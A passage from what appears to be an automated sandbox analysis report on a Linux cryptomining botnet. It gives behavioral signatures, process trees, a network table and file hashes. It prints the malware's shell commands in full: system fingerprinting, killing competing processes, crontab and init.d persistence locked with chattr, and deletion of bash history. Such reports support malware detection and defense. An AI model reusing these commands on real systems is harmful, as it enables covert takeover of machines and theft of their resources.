| File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_version | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | /tmp/.update/.x86_64 | N/A |
Security Software Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/grep | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/grep | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/cpu/types | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /tmp/.update/.x86_64 | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/die_cpus | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/node/online | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/firmware/dmi/tables/smbios_entry_point | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_cpus | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access1/initiators | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/fs/cgroup/cgroup.controllers | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/fs/cgroup/cpuset.mems.effective | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/firmware/dmi/tables/DMI | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/level | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/type | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/meminfo | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/dax/devices/target_node | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/dax/target_node | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators/read_latency | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/fs/cgroup/cpuset.cpus.effective | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/physical_package_id | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/level | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/dax/devices | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_id | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/level | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators/read_bandwidth | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/cpumap | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/package_cpus | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/level | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition | /tmp/.update/.x86_64 | N/A |
Process Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/ps | N/A |
| N/A | N/A | /usr/bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/21/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/83/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/377/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/872/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/101/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/99/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/641/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1557/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1093/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/197/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/963/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/207/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/553/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/119/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1307/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1183/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/86/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/209/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1221/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/209/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/412/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/12/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/14/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/27/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1172/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/1140/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/78/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/417/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1038/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/16/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/638/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/991/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/90/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/845/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1342/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1427/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/767/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1163/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1637/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/453/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1362/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/209/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/222/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/409/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/114/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1124/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/213/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1013/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1245/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/767/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1013/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1054/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/991/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1162/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/6/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1560/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/driver/nvidia/gpus | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /proc/94/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/415/cmdline | /usr/bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/.cron | /bin/sh | N/A |
| File opened for modification | /tmp/.lock | /tmp/.update/.x86_64 | N/A |
Processes
/tmp/.update/.x86_64
[/tmp/.update/.x86_64]
/bin/sh
[sh -c echo "[$(hostname=$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo $hostname | awk {'print $1'} 2>/dev/null)$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print "-"$2'} 2>/dev/null)][$(whoami 2>/dev/null)][$(hostname 2>/dev/null)][$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][$(X=$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/$//' 2>/dev/null); if [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ $(echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'AMD' ]; then echo $X 2>/dev/null | awk {'print $2" "$3" "$4'} 2>/dev/null; else echo $X 2>/dev/null; fi)]"]
/usr/bin/hostname
[hostname -I]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print "-"$2}]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep Port ]
/usr/bin/cat
[cat /etc/ssh/sshd_config]
/usr/bin/whoami
[whoami]
/usr/bin/hostname
[hostname]
/usr/bin/grep
[grep -c ^processor /proc/cpuinfo]
/usr/bin/sed
[sed -e s/$//]
/usr/bin/sed
[sed -e s/^ *//]
/usr/bin/cut
[cut -d: -f2]
/usr/bin/grep
[grep -m 1 model name /proc/cpuinfo]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $4}]
/usr/bin/awk
[awk {print $4}]
/usr/bin/awk
[awk {print $3}]
/usr/bin/awk
[awk {print $4}]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $2" "$3" "$4}]
/bin/sh
[sh -c ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[$2]++ {print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]
/usr/bin/awk
[awk /[zZ]/ && !a[$2]++ {print $2}]
/usr/bin/ps
[ps -A -ostat,ppid]
/usr/bin/id
[id -u]
/usr/bin/grep
[grep -v grep]
/usr/bin/grep
[grep /etc/cron]
/usr/bin/ps
[ps x]
/bin/sh
[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]
/usr/bin/id
[id -u]
/usr/bin/awk
[awk {if($3>30.0) print $2}]
/usr/bin/grep
[grep -v /usr/sbin/httpd]
/usr/bin/grep
[grep -v -- -bash[[:space:]]*$]
/usr/bin/grep
[grep -v grep]
/usr/bin/ps
[ps aux]
/bin/sh
[sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'/tmp/.update/.x86_64' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.x86_64$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null]
/usr/bin/rm
[rm -rf /tmp/.update/.cron]
/usr/bin/grep
[grep -v /tmp/.update/.x86_64]
/usr/bin/grep
[grep -v grep]
/usr/bin/crontab
[crontab -l]
/usr/bin/wc
[wc -l]
/usr/bin/uniq
[uniq]
/usr/bin/sort
[sort]
/usr/bin/grep
[grep /tmp/.update/.x86_64$]
/usr/bin/grep
[grep -v grep]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab /tmp/.update/.cron]
/usr/bin/rm
[rm -rf /tmp/.update/.cron]
/bin/sh
[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi]
/usr/bin/id
[id -u]
/usr/bin/wc
[wc -l]
/usr/bin/awk
[awk {if($3>30.0) print $2}]
/usr/bin/grep
[grep -- -bash[[:space:]]*$]
/usr/bin/grep
[grep -v grep]
/usr/bin/ps
[ps aux]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | xmr-rx0.pwndns.pw | udp |
| US | 8.8.8.8:53 | xmr-rx0.pwndns.pw | udp |
| US | 137.184.223.223:80 | xmr-rx0.pwndns.pw | tcp |
Files
memory/1561-1-0x00007f1992cec000-0x00007f19933aad40-memory.dmp
/tmp/.update/.cron
| MD5 | d9da11a4b232a0003f710416ca81b6dd |
| SHA1 | 0ef01cf8be696a94f0c20223dc85f68cbc9038c1 |
| SHA256 | 1842334260d8c3c1b5278c7ffcb6e8bae750cafcdfe41d7c40e5faa9d26e72ee |
| SHA512 | b7f72c07c53aac4cea28e15d678ce70de3cea04928afa7b6f2e835fefaf40462879cfa7c941f0d0f47ac1b6ff50a6e54072d3f980f93279f0f86118ac98f4e32 |
/var/spool/cron/crontabs/tmp.NdujH4
| MD5 | dbbe047a01305ffcd7927d8a56c55eb1 |
| SHA1 | 1c7db54bf5706ef8df444e4d7535b6f32dd5f96d |
| SHA256 | 63d9f82a6a2fe9b6e17112df9bccf53a931add1ec27f01a47e7af9024dafe670 |
| SHA512 | 8e5263187070b7236bcbda6b18c9b2f2546b37135e019cd2011028d7d36cccf76d402cde20f9ff7510ffff20b7568d7899cdc9a375f348b3ebb9cc584c9ed1a0 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-armhf-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/clean
[/tmp/.systemd/clean]
/bin/uname
[uname -m]
/bin/rm
[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]
/bin/rm
[rm -rf /root/.bash_history]
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsel-20240418-en
Max time kernel
3s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.hourly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.monthly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.weekly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.d/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.daily/ntpdate | /usr/bin/tee | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/ntpdate | /usr/bin/tee | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/lntpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/entpdate | /usr/bin/tee | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/ntpdate | N/A |
Processes
/tmp/.systemd/ntpdate
[/tmp/.systemd/ntpdate]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/bin/mkdir
[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]
/usr/bin/chattr
[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]
/bin/rm
[rm -rf /sbin/bcrond]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bcrond]
/usr/bin/tee
[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]
/bin/chmod
[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr -a -i /sbin/bsysd]
/bin/rm
[rm -rf /sbin/bsysd]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/entpdate /sbin/bsysde]
/bin/rm
[rm -rf /sbin/bsysde]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysde]
/usr/bin/tee
[tee -a /sbin/entpdate]
/bin/chmod
[chmod +x /sbin/entpdate]
/usr/bin/chattr
[chattr +i +a /sbin/entpdate /sbin/bsysde]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/lntpdate /sbin/bsysdl]
/bin/rm
[rm -rf /sbin/bsysdl]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysdl]
/usr/bin/tee
[tee -a /sbin/lntpdate]
/bin/chmod
[chmod +x /sbin/lntpdate]
/usr/bin/chattr
[chattr +i +a /sbin/lntpdate /sbin/bsysdl]
/usr/bin/which
[which update-rc.d]
/usr/bin/chattr
[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]
/bin/rm
[rm -rf /sbin/binitd]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/binitd]
/usr/bin/tee
[tee -a /etc/init.d/ntpdate]
/bin/chmod
[chmod +x /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/chattr
[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/which
[which chkconfig]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/etc/cron.d/ntpdate
| MD5 | 755700d11d59e0daeb4f6452aee1ad5d |
| SHA1 | 6b1194921376bef9c7559629712772a11e78eaa4 |
| SHA256 | 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00 |
| SHA512 | 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7 |
/sbin/entpdate
| MD5 | 4aeb6335d69473274691f59dc2096cfe |
| SHA1 | 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc |
| SHA256 | 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785 |
| SHA512 | 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c |
/sbin/lntpdate
| MD5 | 3748e897538baafbc7b260b4d2fbc98f |
| SHA1 | 41d179e3cfc4c1820ea2c0fed0d50009564db79b |
| SHA256 | ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7 |
| SHA512 | 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea |
/etc/init.d/ntpdate
| MD5 | bd99a962d94b5b4c32f8b7c8ca1f9ea9 |
| SHA1 | af33dc04d1f16e5ccceb2c0569b26e45bb65b32b |
| SHA256 | 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28 |
| SHA512 | fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa |
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-armhf-20240729-en
Max time kernel
0s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/update.dir | /tmp/.update/.run | N/A |
| File opened for modification | /tmp/.update/.update | /tmp/.update/.run | N/A |
Processes
/tmp/.update/.run
[/tmp/.update/.run]
/bin/uname
[uname -m]
/bin/cat
[cat update.dir]
/tmp/.update/.armv7l
[./.armv7l -f]
Network
Files
/tmp/.update/update.dir
| MD5 | f162d09e078b8201089b7e20ea72f2bf |
| SHA1 | f7da8700cd21e201f62a17992d2ac15c09c447a1 |
| SHA256 | 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb |
| SHA512 | adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb |
/tmp/.update/.update
| MD5 | 144c1506f2865d421680f10562c63251 |
| SHA1 | a66615eec6e36d204170e45cd5bab05280f61a17 |
| SHA256 | c36f0bd30acee23f4eeabc05598d5365df341c0372a68c935c30ff94d379f032 |
| SHA512 | 2a2099e1a4fe4a86f1710934ec398d1dbdae1c0b9c04502af383318163d06d27f40dd9c6581a541ee11f36b743aaf127474ee244d224bfe5929f0c33c32eccd5 |
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-armhf-20240611-en
Max time kernel
4s
Command Line
Signatures
Adds new SSH keys
| Description | Indicator | Process | Target |
